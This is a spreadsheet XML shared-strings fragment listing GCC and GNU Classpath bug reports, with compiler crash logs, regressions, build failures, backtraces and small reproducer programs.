  <si>
    <t>david.decotigny</t>
  </si>
  <si>
    <t>GCC-6698</t>
  </si>
  <si>
    <t>gcc crashes in reload_cse_simplify_operands (M68HC12)</t>
  </si>
  <si>
    <t>m68hc12-elf-gcc -g -Os -mshort -fomit-frame-pointer -mauto-incdec -msoft-reg-count=0 -Wl-defsymports=0x0-u-mm68hc12elfb -o scanner.elf scanner.c
scanner.c: In function `main':
scanner.c:42: insn does not satisfy its constraints:
(insn 67 65 68 (set (mem/v:QI (const_int 174 [0xae]) [0 S1 A8])
        (ior:QI (mem/v:QI (const_int 174 [0xae]) [0 S1 A8])
            (const_int 2 [0x2]))) 83 {*iorqi3_const} (insn_list 60 (nil))
    (nil))
scanner.c:42: Internal compiler error in reload_cse_simplify_operands at reload1.c:8368
Release:
gcc version 3.1
How-To-Repeat:
See description.
Compilation works if the delay() is placed directly into the while(1) loop.</t>
  </si>
  <si>
    <t>GCC-6155</t>
  </si>
  <si>
    <t>Bug#95318: Info received and FILED only</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 95318-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was pending/6129: Bug#95318: Info received and FILED only)</t>
  </si>
  <si>
    <t>95318-quiet</t>
  </si>
  <si>
    <t>GCC-27986</t>
  </si>
  <si>
    <t>[4.2 Regression] jump to middle of loop on entry with using old version of an variable</t>
  </si>
  <si>
    <t>in the following code gcc choses the registers in such a way that it causes itself an extra copy for every loop iteration and has to jump past the copy to start the loop... it's probably easiest to describe just by looking at the code:
% cat jmp-over.c
void foo(int *v int *d int g)
{
  int s = v[1]
  int s0
  do {
    s0 = s
    s += *d
    ++d
  } while (s &lt; g)
  v[0] = s0
}
% gcc -g -O3 -Wall   -c -o jmp-over.o jmp-over.c
% objdump -dr jmp-over.o
jmp-over.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 :
   0:   8b 4f 04                mov    0x4(%rdi)%ecx
   3:   eb 02                   jmp    7 
   5:   89 c1                   mov    %eax%ecx
   7:   89 c8                   mov    %ecx%eax
   9:   03 06                   add    (%rsi)%eax
   b:   48 83 c6 04             add    $0x4%rsi
   f:   39 d0                   cmp    %edx%eax
  11:   7c f2                   jl     5 
  13:   89 0f                   mov    %ecx(%rdi)
  15:   c3                      retq
the jump-over is unnecessary...
        mov    0x4(%rdi)%ecx
1:      mov    %ecx%eax
        add    (%rsi)%ecx
        add    $0x4%rsi
        cmp    %edx%ecx
        jl     1b
        mov    %eax(%rdi)
        retq
-dean
% gcc -v
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../gcc/configure --prefix=/home/odo/gcc --host=x86_64-linux-gnu --disable-multilib --enable-languages=cc++ --disable-bootstrap
Thread model: posix
gcc version 4.2.0 20060603 (experimental)</t>
  </si>
  <si>
    <t>GCC-67421</t>
  </si>
  <si>
    <t>gcc.dg/wide-shift-64.c FAILs</t>
  </si>
  <si>
    <t>Created attachment 36275
wide-shift-64.c.219r.combine
The new gcc.dg/wide-shift-64.c testcase FAILs on SPARC for the 64-bit multilib
only:
FAIL: gcc.dg/wide-shift-64.c scan-rtl-dump-not combine ior
I'm attaching the dump.
Btw. I noticed a nit: both the ChangeLog entry and the commit message mention gcc.dg/wide_shift_64_1.c and gcc.dg/wide_shift_128_1.c
  while the actual files are named gcc.dg/wide-shift-64.c and gcc.dg/wide-shift-128.c (similarly for the aarch64 testcase) which makes it harder to find
when/by whom the files were committed.
  Rainer</t>
  </si>
  <si>
    <t>GCC-46193</t>
  </si>
  <si>
    <t>ICE: in omp_reduction_init at omp-low.c:2212 with -ftree-parallelize-loops</t>
  </si>
  <si>
    <t>Created attachment 22167
reduced testcase (from gcc.dg/torture/pr45869.c)
Compiler output:
$ gcc -O -ftree-parallelize-loops=2 pr46193.c 
pr46193.c: In function 'foo':
pr46193.c:1:7: internal compiler error: in omp_reduction_init at omp-low.c:2212
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165915 - crash
4.5 r165781 - crash
4.4 r165754 - crash
4.4 r149995 - crash</t>
  </si>
  <si>
    <t>GCC-58600</t>
  </si>
  <si>
    <t>[c++11] ICE on wrong usage of alignas</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers an ICE since GCC 4.8.0 (when alignas was introduced):
================================
namespace N {}
using namespace N alignas(int)
================================
bug.cc:2:30: internal compiler error: tree check: expected identifier_node have tree_list in private_is_attribute_p at tree.c:5540
 using namespace N alignas(int)
                              ^
0xcd87ea tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9176
0xcd8b64 tree_check
        ../../gcc/gcc/tree.h:2819
0xcd8b64 private_is_attribute_p(char const* unsigned long tree_node const*)
        ../../gcc/gcc/tree.c:5540
0x6ff9ff is_attribute_p
        ../../gcc/gcc/tree.h:3678
0x6ff9ff parse_using_directive(tree_node* tree_node*)
        ../../gcc/gcc/cp/name-lookup.c:3995
0x6545c2 cp_parser_using_directive
        ../../gcc/gcc/cp/parser.c:15951
0x6545c2 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10837
0x65cf1e cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10764
0x65bc8a cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10650
0x65d556 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3939
0x65d556 c_parse_file()
        ../../gcc/gcc/cp/parser.c:28899
0x7709e3 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]
A slightly modified example crashes in a different location:
================================
namespace N {}
using namespace N alignas(X)
================================
bug.cc:2:27: error: 'X' was not declared in this scope
 using namespace N alignas(X)
                           ^
bug.cc:2:27: internal compiler error: tree check: expected tree_list have error_mark in parse_using_directive at cp/name-lookup.c:3994
0xcd87ea tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9176
0x6ffabe tree_check
        ../../gcc/gcc/tree.h:2609
0x6ffabe parse_using_directive(tree_node* tree_node*)
        ../../gcc/gcc/cp/name-lookup.c:3994
0x6545c2 cp_parser_using_directive
        ../../gcc/gcc/cp/parser.c:15951
0x6545c2 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10837
0x65cf1e cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10764
0x65bc8a cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10650
0x65d556 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3939
0x65d556 c_parse_file()
        ../../gcc/gcc/cp/parser.c:28899
0x7709e3 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-47595</t>
  </si>
  <si>
    <t>c-c++-common/uninit-17.c fails test for warnings when -fgraphite-identity enabled at -O2</t>
  </si>
  <si>
    <t>When -fgraphite-identity is enabled in gcc trunk at -O2 like the graphite branch...
Index: gcc/opts.c
===================================================================
--- gcc/opts.c	(revision 169512)
+++ gcc/opts.c	(working copy)
@@ -4596 +4599 @@ static const struct default_options defa
     { OPT_LEVELS_1_PLUS OPT_fcompare_elim NULL 1 }
     /* -O2 optimizations.  */
+#ifdef HAVE_cloog
+    { OPT_LEVELS_2_PLUS OPT_fgraphite_identity NULL 1 }
+#endif
     { OPT_LEVELS_2_PLUS OPT_finline_small_functions NULL 1 }
     { OPT_LEVELS_2_PLUS OPT_findirect_inlining NULL 1 }
     { OPT_LEVELS_2_PLUS OPT_fpartial_inlining NULL 1 }
The failures...
FAIL: c-c++-common/uninit-17.c  (test for warnings line 12)
FAIL: c-c++-common/uninit-17.c  (test for warnings line 16)
FAIL: c-c++-common/uninit-17.c (test for excess errors)
occur. These are of the form...
Executing on host: /sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/testsuite/g++/../../g++ -B/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/testsuite/g++/../../ /sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/gcc/testsuite/c-c++-common/uninit-17.c  -nostdinc++ -I/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/x86_64-apple-darwin10.7.0/i386/libstdc++-v3/include/x86_64-apple-darwin10.7.0 -I/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/x86_64-apple-darwin10.7.0/i386/libstdc++-v3/include -I/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/libstdc++-v3/libsupc++ -I/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/libstdc++-v3/include/backward -I/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/libstdc++-v3/testsuite/util -fmessage-length=0  -O2 -Wuninitialized -fno-ivopts  -S  -m32 -o uninit-17.s    (timeout = 300)
/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/gcc/testsuite/c-c++-common/uninit-17.c: In function 'void foobar(int int*)':^M
/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/gcc/testsuite/c-c++-common/uninit-17.c:21:6: warning: 'b' is used uninitialized in this function [-Wuninitialized]^M
output is:
/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/gcc/testsuite/c-c++-common/uninit-17.c: In function 'void foobar(int int*)':^M
/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20110202/gcc/testsuite/c-c++-common/uninit-17.c:21:6: warning: 'b' is used uninitialized in this function [-Wuninitialized]^M
FAIL: c-c++-common/uninit-17.c  (test for warnings line 12)
FAIL: c-c++-common/uninit-17.c  (test for warnings line 16)
FAIL: c-c++-common/uninit-17.c (test for excess errors)
and look similar to those in the fixed PR44738.</t>
  </si>
  <si>
    <t>CLASSPATH-24099</t>
  </si>
  <si>
    <t>GdkGraphics2D.copyArea() needs to be implemented</t>
  </si>
  <si>
    <t>The recent changes to the Swing repainting mechanism rely on
Graphics.copyArea() but that method is not implemented in GdkGraphics2D.
The overall effect is that I cannot any longer run my test applications
with Graphics2D enabled (-Dgnu.java.awt.peer.gtk.Graphics=Graphics2D) 
due to instant UOEs on every repaint:
Exception during event dispatch:
java.lang.UnsupportedOperationException
   at gnu.java.awt.peer.gtk.GdkGraphics2D.copyArea (GdkGraphics2D.java:1397)
   at javax.swing.JViewport.paintBackingStore (JViewport.java:817)
   at javax.swing.JViewport.paintBlit (JViewport.java:870)
   at javax.swing.JViewport.paint (JViewport.java:499)
   at javax.swing.JComponent.paintChildren (JComponent.java:1539)
   at javax.swing.JComponent.paint (JComponent.java:1476)
   at javax.swing.JComponent.paintChildren (JComponent.java:1539)
   at javax.swing.JSplitPane.paintChildren (JSplitPane.java:526)
   at javax.swing.JComponent.paint (JComponent.java:1476)
   at javax.swing.JComponent.paintChildren (JComponent.java:1539)
   at javax.swing.JComponent.paint (JComponent.java:1476)
   at javax.swing.JComponent.paintChildren (JComponent.java:1539)
   at javax.swing.JComponent.paint (JComponent.java:1476)
   at javax.swing.JLayeredPane.paint (JLayeredPane.java:687)
   at javax.swing.JComponent.paintChildren (JComponent.java:1539)
   at javax.swing.JComponent.paint (JComponent.java:1476)
   at javax.swing.JComponent.paintDoubleBuffered (JComponent.java:1665)
   at javax.swing.JComponent.paintImmediately2 (JComponent.java:1638)
   at javax.swing.JComponent.paintImmediately (JComponent.java:1622)
   at javax.swing.RepaintManager.paintDirtyRegions (RepaintManager.java:465)
   at javax.swing.RepaintManager$RepaintWorker.run (RepaintManager.java:109)
   at java.awt.event.InvocationEvent.dispatch (InvocationEvent.java:191)
   at java.awt.EventQueue.dispatchEvent (EventQueue.java:466)
   at java.awt.EventDispatchThread.run (EventDispatchThread.java:75)</t>
  </si>
  <si>
    <t>CLASSPATH-33751</t>
  </si>
  <si>
    <t>Classpath fails to build on Solaris 2.9 (SPARC)</t>
  </si>
  <si>
    <t>/share/nlp/projects/cashew/solaris/bin/gcc -DHAVE_CONFIG_H -I. -I/share/nlp/projects/cashew/sources/classpath/native/jni/native-lib -I../../../include -I/share/nlp/projects/cashew/sources/classpath/include -I/share/nlp/projects/cashew/sources/classpath/native/jni/classpath -I/share/nlp/projects/cashew/sources/classpath/native/jni/native-lib -I/share/nlp/projects/cashew/solaris/lib/gcc/sparc-sun-solaris2.8/4.0.2/include/libffi -I/share/nlp/projects/cashew/solaris/include -W -Wall -Wmissing-declarations -Wwrite-strings -Wmissing-prototypes -Wno-long-long -Wstrict-prototypes -pedantic -Werror -g -O2 -MT cpio.lo -MD -MP -MF .deps/cpio.Tpo -c /share/nlp/projects/cashew/sources/classpath/native/jni/native-lib/cpio.c  -fPIC -DPIC -o .libs/cpio.o
cc1: warnings being treated as errors
/share/nlp/projects/cashew/sources/classpath/native/jni/native-lib/cpio.c: In function 'cpio_readDir':
/share/nlp/projects/cashew/sources/classpath/native/jni/native-lib/cpio.c:529: warning: implicit declaration of function 'readdir_r'</t>
  </si>
  <si>
    <t>GCC-81627</t>
  </si>
  <si>
    <t>[8 Regression] ICE on valid code at -O3: in check_loop_closed_ssa_use at tree-ssa-loop-manip.c:707</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170731 (experimental) [trunk revision 250725] (GCC)
$
$ gcc-trunk -O2 small.c ./a.out
$
$ gcc-trunk -O3 small.c
during GIMPLE pass: pcom
small.c: In function â€˜fn1â€™:
small.c:3:6: internal compiler error: in check_loop_closed_ssa_use at tree-ssa-loop-manip.c:707
 void fn1 ()
      ^~~
0xdd5aed check_loop_closed_ssa_use
        ../../gcc-source-trunk/gcc/tree-ssa-loop-manip.c:706
0xdd8b5e verify_loop_closed_ssa(bool)
        ../../gcc-source-trunk/gcc/tree-ssa-loop-manip.c:751
0xb6b1a9 execute_function_todo
        ../../gcc-source-trunk/gcc/passes.c:2008
0xb6bac9 execute_todo
        ../../gcc-source-trunk/gcc/passes.c:2044
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
-------------------------------------
int a b c d[6] e f
void fn1 ()
{ 
  for (b = 1 b &lt; 5 b++)
    { 
      for (c = 0 c &lt; 5 c++)
        d[b] = e
      if (a)
        f++
      d[b + 1] = 1
    }
}
int main ()
{ 
  fn1 ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-48710</t>
  </si>
  <si>
    <t>raised STORAGE_ERROR : stack overflow (or erroneous memory access) in g-catiio.adb</t>
  </si>
  <si>
    <t>Building cross x86_64-unknown-linux-gnu to i686-pc-cygwin:
/SCRATCH/tmp.jYKMdkdWc2/gcc-4.7.0/gcc-4.7.0/./gcc/xgcc -B/SCRATCH/tmp.jYKMdkdWc2/gcc-4.7.0/gcc-4.7.0/./gcc/ -B/opt/devel/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_11.3/cross/CYGWIN_NT-5.1/i686-pc-cygwin/cygwin-1.7.9-1/gcc-4.7.0/i686-pc-cygwin/bin/ -B/opt/devel/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_11.3/cross/CYGWIN_NT-5.1/i686-pc-cygwin/cygwin-1.7.9-1/gcc-4.7.0/i686-pc-cygwin/lib/ -isystem /opt/devel/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_11.3/cross/CYGWIN_NT-5.1/i686-pc-cygwin/cygwin-1.7.9-1/gcc-4.7.0/i686-pc-cygwin/include -isystem /opt/devel/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_11.3/cross/CYGWIN_NT-5.1/i686-pc-cygwin/cygwin-1.7.9-1/gcc-4.7.0/i686-pc-cygwin/sys-include    -c -g -O2   -W -Wall -gnatpg   g-catiio.adb -o g-catiio.o
raised STORAGE_ERROR : stack overflow (or erroneous memory access)</t>
  </si>
  <si>
    <t>GCC-53373</t>
  </si>
  <si>
    <t>[4.8 regression] ICE on valid code with -mavx</t>
  </si>
  <si>
    <t>Created attachment 27417
Preprocessed testcase
When compiling the attached testcase on an Intel Core i3-2120 with a recent
trunk version of gcc the compiler segfaults:
/scratch/martin/mysvn/libpsht3&gt;gcc -v -O2 -march=native -c bug.i
Using built-in specs.
COLLECT_GCC=gcc
Target: x86_64-unknown-linux-gnu
Configured with: /scratch/martin/gccgit/configure --disable-graphite --enable-gold --enable-plugins --prefix=/afs/mpa/data/martin/ugcc --with-libelf=/afs/mpa/data/martin/numlibs64 --enable-languages=c++fortran --enable-target=all --enable-checking=release --enable-build-with-cxx
Thread model: posix
gcc version 4.8.0 20120516 (experimental) [trunk revision a756f44:a2ddc2d:669c9ede91a14c0cc74b38c1ab923146ac3919b2] (GCC) 
COLLECT_GCC_OPTIONS='-v' '-O2' '-march=native' '-c'
 /afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/cc1 -fpreprocessed bug.i -march=corei7-avx -mcx16 -msahf -mno-movbe -mno-aes -mpclmul -mpopcnt -mno-abm -mno-lwp -mno-fma -mno-fma4 -mno-xop -mno-bmi -mno-bmi2 -mno-tbm -mavx -mno-avx2 -msse4.2 -msse4.1 -mno-lzcnt -mno-rtm -mno-hle --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=3072 -mtune=corei7-avx -quiet -dumpbase bug.i -auxbase bug -O2 -version -o /tmp/ccLcgfAs.s
GNU C (GCC) version 4.8.0 20120516 (experimental) [trunk revision a756f44:a2ddc2d:669c9ede91a14c0cc74b38c1ab923146ac3919b2] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.0 20120516 (experimental) [trunk revision a756f44:a2ddc2d:669c9ede91a14c0cc74b38c1ab923146ac3919b2] GMP version 5.0.1 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (GCC) version 4.8.0 20120516 (experimental) [trunk revision a756f44:a2ddc2d:669c9ede91a14c0cc74b38c1ab923146ac3919b2] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.0 20120516 (experimental) [trunk revision a756f44:a2ddc2d:669c9ede91a14c0cc74b38c1ab923146ac3919b2] GMP version 5.0.1 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 03c904a1dcafbbea3957ffe55a6c30c7
libfftpack/fftpack.c: In function 'rfftf':
libfftpack/fftpack.c:799:3: internal compiler error: Segmentation fault
   { if(n!=1) rfftf1(n r wsave wsave+n(size_t*)(wsave+2*n)) }
   ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This ICE seems to have been introduced fairly recently. I didn't encounter it a few days ago.</t>
  </si>
  <si>
    <t>GCC-82300</t>
  </si>
  <si>
    <t>Bootstrapping gcc-8 does not work on darwin</t>
  </si>
  <si>
    <t>Bootstrapping gcc-8 [trunk revision 252896] on x86_64-apple-darwin15.6.0 does not work. I utilize clang the system compiler for building stage 1.
echo timestamp &gt; s-match
g++ -std=gnu++98 -c   -g  -DIN_GCC    -fno-strict-aliasing -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -fno-PIE -I. -Ibuild -I../../gcc/gcc -I../../gcc/gcc/build -I../../gcc/gcc/../include  -I../../gcc/gcc/../libcpp/include -I/sw/include \
	-o build/genattrtab.o ../../gcc/gcc/genattrtab.c
clang: warning: treating 'c' input as 'c++' when in C++ mode this behavior is deprecated
In file included from ../../gcc/gcc/genattrtab.c:107:
../../gcc/gcc/coretypes.h:73:1: warning: class 'rtx_def' was previously declared as a struct [-Wmismatched-tags]
class rtx_def
^
../../gcc/gcc/coretypes.h:55:8: note: previous use is here
struct rtx_def
       ^
In file included from ../../gcc/gcc/genattrtab.c:107:
In file included from ../../gcc/gcc/coretypes.h:400:
../../gcc/gcc/machmode.h:313:1: warning: 'pod_mode' defined as a struct template here but previously declared as a class template [-Wmismatched-tags]
struct pod_mode
^
../../gcc/gcc/coretypes.h:66:20: note: did you mean struct here?
template class pod_mode
                   ^~~~~
                   struct
In file included from ../../gcc/gcc/genattrtab.c:108:
In file included from ./tm.h:16:
./options.h:5803:2: error: too many target masks
#error too many target masks
 ^
In file included from ../../gcc/gcc/genattrtab.c:109:
In file included from ../../gcc/gcc/rtl.h:31:
In file included from ../../gcc/gcc/hash-table.h:235:
../../gcc/gcc/ggc.h:272:8: warning: struct 'rtx_def' was previously declared as a class [-Wmismatched-tags]
inline struct rtx_def *
       ^
../../gcc/gcc/coretypes.h:73:7: note: previous use is here
class rtx_def
      ^
In file included from ../../gcc/gcc/genattrtab.c:109:
In file included from ../../gcc/gcc/rtl.h:31:
In file included from ../../gcc/gcc/hash-table.h:235:
../../gcc/gcc/ggc.h:275:11: warning: struct 'rtx_def' was previously declared as a class [-Wmismatched-tags]
  return (struct rtx_def *) ggc_internal_alloc (s PASS_MEM_STAT)
          ^
../../gcc/gcc/coretypes.h:73:7: note: previous use is here
class rtx_def
      ^
In file included from ../../gcc/gcc/genattrtab.c:109:
In file included from ../../gcc/gcc/rtl.h:31:
In file included from ../../gcc/gcc/hash-table.h:561:
../../gcc/gcc/mem-stats.h:126:1: warning: 'mem_usage' defined as a struct here but previously declared as a class [-Wmismatched-tags]
struct mem_usage
^
../../gcc/gcc/hash-table.h:341:1: note: did you mean struct here?
class mem_usage
^~~~~
struct
In file included from ../../gcc/gcc/genattrtab.c:109:
../../gcc/gcc/rtl.h:298:1: warning: 'rtx_def' defined as a struct here but previously declared as a class [-Wmismatched-tags]
struct GTY((desc(0) tag(0)
^
../../gcc/gcc/coretypes.h:73:1: note: did you mean struct here?
class rtx_def
^~~~~
struct
6 warnings and 1 error generated.
make[3]: *** [Makefile:2646: build/genattrtab.o] Fehler 1
make[3]: *** Es wird auf noch nicht beendete Prozesse gewartet....
rm gcov.pod gpl.pod cpp.pod gfdl.pod fsf-funding.pod gcc.pod gcov-dump.pod gcov-tool.pod
make[3]: Verzeichnis â€ž/Users/Peter/Devel/buildgcc/gccâ€œ wird verlassen
make[2]: *** [Makefile:4662: all-stage1-gcc] Fehler 2
make[2]: Verzeichnis â€ž/Users/Peter/Devel/buildgccâ€œ wird verlassen
make[1]: *** [Makefile:22008: stage1-bubble] Fehler 2
make[1]: Verzeichnis â€ž/Users/Peter/Devel/buildgccâ€œ wird verlassen
make: *** [Makefile:974: all] Fehler 2</t>
  </si>
  <si>
    <t>GCC-63731</t>
  </si>
  <si>
    <t>Fallback to netgo does not work</t>
  </si>
  <si>
    <t>When the DNS resolver with CGO fails for statically linked binaries it should fall back to the pure-go DNS resolver if I understand correctly.
This fallback mechanism does work at least on Linux for x86_64 and ppc64le.
The variable ok in lookupIP in go/net/lookup_unix.go seems always set to true so the fallback mechanism would never be called.
Here is an example code to demonstrate the problem.
$ gccgo -v
Using built-in specs.
COLLECT_GCC=gccgo
COLLECT_LTO_WRAPPER=/usr/local/gccgo-216834/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../src/configure --enable-threads=posix --enable-shared --enable-__cxa_atexit --enable-languages=cc++go --enable-secureplt --enable-checking=yes --with-long-double-128 --enable-decimal-float --disable-bootstrap --disable-alsa --disable-multilib --prefix=/usr/local/gccgo-216834
Thread model: posix
gcc version 5.0.0 20141029 (experimental) (GCC) 
$ cat lookup.go 
package main
import (
	fmt
	net
)
func main() {
	addrs err := net.LookupHost(gcc.gnu.org)
	if err != nil {
		fmt.Println(err)
	} else {
		for i := 0 i &lt; len(addrs) i++ {
			fmt.Println(addrs[i])
		}
	}
}
$ gccgo lookup.go 
$ ./a.out 
209.132.180.131
$ gccgo -static lookup.go 
/usr/local/gccgo-216834/lib/gcc/x86_64-unknown-linux-gnu/5.0.0/../../../../lib64/libgo.a(net.o): In function `net.cgoLookupPort':
/home/yohei/gccgo.216834/bld/x86_64-unknown-linux-gnu/libgo/../../../src/libgo/go/net/cgo_unix.go:83: warning: Using 'getaddrinfo' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking
$ ./a.out 
lookup gcc.gnu.org: Name or service not known
$ LD_LIBRARY_PATH=/lib/x86_64-linux-gnu ./a.out 
209.132.180.131</t>
  </si>
  <si>
    <t>yohei</t>
  </si>
  <si>
    <t>GCC-34052</t>
  </si>
  <si>
    <t>[4.3 regression] Trouble with variadic templates as template-template parameter</t>
  </si>
  <si>
    <t>The following code snippet is IMHO wrongly accepted on mainline:
=====================================================================
template class U&gt; struct A {}
=====================================================================
A slightly modified example ICE's:
=====================================================================
template class U&gt; struct A
{
  template U foo()
}
=====================================================================
bug.cc:3: internal compiler error: in tsubst at cp/pt.c:8466
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-71028</t>
  </si>
  <si>
    <t>[7 regression] ICE in redirect_jump at jump.c:1560</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/pr37483.c and
gcc.dg/20010822-1.c
FAILs on arm-none-eabi with:
...: internal compiler error: in redirect_jump at jump.c:1560
 }
 ^
0x98314d redirect_jump(rtx_jump_insn* rtx_def* int)
        ../../gcc/gcc/jump.c:1560
0x10b8276 try_optimize_cfg
        ../../gcc/gcc/cfgcleanup.c:2900
0x10b8276 cleanup_cfg(int)
        ../../gcc/gcc/cfgcleanup.c:3150
0x10b9646 execute
        ../../gcc/gcc/cfgcleanup.c:3279
The following commit seem to cause it:
https://gcc.gnu.org/viewcvs?rev=235904&amp;root=gcc&amp;view=rev</t>
  </si>
  <si>
    <t>vp</t>
  </si>
  <si>
    <t>GCC-63860</t>
  </si>
  <si>
    <t>Ill-formed std::pair::swap implementation?</t>
  </si>
  <si>
    <t>According to
http://llvm.org/bugs/show_bug.cgi?id=21565
and
http://lists.cs.uiuc.edu/pipermail/cfe-commits/Week-of-Mon-20141110/118441.html
std::pair::swap implementation in libstdc++ in GCC 4.8.3 is ill-formed.
I checked trunk and it isn't changed.  Is libstdc++ wrong here?</t>
  </si>
  <si>
    <t>GCC-26361</t>
  </si>
  <si>
    <t>[4.2 regression] bootstrap failure on Alpha: xgcc runs out of memory compiling libiberty/md5.c</t>
  </si>
  <si>
    <t>% ../configure --enable-languages=c &amp;&amp; nice make bootstrap
[...]
/src/gcc-2006.02.19/build/./prev-gcc/xgcc -B/src/gcc-2006.02.19/build/./prev-gcc/ -B/usr/local/alphaev68-unknown-linux-gnu/bin/ -c -DHAVE_CONFIG_H -g -O2 -I. -I../../libiberty/../include  -W -Wall -pedantic -Wwrite-strings -Wstrict-prototypes -Wc++-compat ../../libiberty/md5.c -o md5.o
virtual memory exhausted: Cannot allocate memory
make[3]: *** [md5.o] Error 1
make[3]: Leaving directory `/src/gcc-2006.02.19/build/libiberty'
see also log at http://buildd.debian.org/fetch.php?pkg=gcc-snapshot&amp;arch=alpha&amp;ver=20060218-2&amp;stamp=1140318890&amp;file=log
must have been introduced between 2006-02-01 and 2006-02-18</t>
  </si>
  <si>
    <t>GCC-49298</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] [C++0x]  sorry unimplemented: unexpected ast of kind field_decl</t>
  </si>
  <si>
    <t>Created attachment 24442
preprocessed source
using a boost.intrusive header with c++0x support gcc-4.6 stops with the following error. the same code compiles fine with gcc-4.5 and without c++0x support
/usr/include/boost/intrusive/list.hpp: In static member function â€˜static boost::intrusive::list_impl&amp; boost::intrusive::list_impl::priv_container_from_end_iterator(const const_iterator&amp;)â€™:
/usr/include/boost/intrusive/list.hpp:1274:88: sorry unimplemented: unexpected ast of kind field_decl
/usr/include/boost/intrusive/list.hpp:1274: confused by earlier errors bailing out
g++ -v:
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.6.0-3~ppa1' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --with-multiarch-defaults=x86_64-linux-gnu --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib/x86_64-linux-gnu --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib/x86_64-linux-gnu --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.1 20110409 (prerelease) (Ubuntu 4.6.0-3~ppa1)</t>
  </si>
  <si>
